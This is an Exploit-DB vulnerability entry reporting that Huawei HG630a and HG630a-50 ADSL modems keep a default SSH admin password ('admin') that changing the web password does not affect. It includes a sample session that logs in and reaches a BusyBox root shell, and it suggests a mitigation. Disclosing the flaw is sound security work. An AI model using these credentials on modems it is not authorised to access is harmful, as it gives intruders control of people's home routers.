Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems

vendor:

Adsl Modems

by:

Murat Sahin

7.5

CVSS

HIGH

Default SSH Admin Password

798

CWE

Product Name: Adsl Modems

Affected Version From: HG630a and HG630a-50

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux, Windows

2015

Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems

Adsl modems force you to change admin web interface password. Even though you can change admin password on the web interface, the password you assign does not apply to ssh. So, SSH password always will be 'Username:admin Password:admin'.

Mitigation:

Change the default SSH password for the admin account on the modem.

Source

Exploit-DB raw data:

# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
# Date: 10.11.2015
# Exploit Author: Murat Sahin  (@murtshn)
# Vendor Homepage: Huawei
# Version: HG630a and HG630a-50
# Tested on: linux,windows

Adsl modems force you to change admin web interface password. Even though
you can change admin password on the web interface,  the password you
assign does not apply to ssh. So, SSH password always  will be
'Username:admin Password:admin'.

Ex:

*ssh admin@modemIP <admin@192.168.1.1>*
admin@modemIP <admin@192.168.1.1>'s password:*admin*
PTY allocation request failed on channel 0
------------------------------
-
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell


BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /proc/version
cat /proc/version
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#